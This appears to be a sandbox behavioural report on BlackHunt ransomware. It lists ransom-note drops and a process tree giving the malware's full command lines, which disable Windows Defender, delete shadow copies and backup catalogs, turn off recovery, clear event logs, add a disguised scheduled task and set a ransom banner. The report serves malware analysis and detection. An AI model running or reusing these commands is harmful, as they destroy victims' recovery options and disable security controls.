| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ar_get.svg | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\dotnet\host\fxr\7.0.16\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\currency.data | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_ReadMe.txt | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\cs-cz\#BlackHunt_Private.key | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\#BlackHunt_ReadMe.hta | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\mshta.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings | C:\Windows\System32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | C:\Windows\system32\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe
"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
C:\Windows\system32\schtasks.exe
SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\system32\fsutil.exe
fsutil.exe usn deletejournal /D C:
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D F:\
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D C:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
C:\Windows\system32\fsutil.exe
fsutil usn deletejournal /D M:\
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Setup
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl System
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Application
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
C:\Windows\System32\cmd.exe
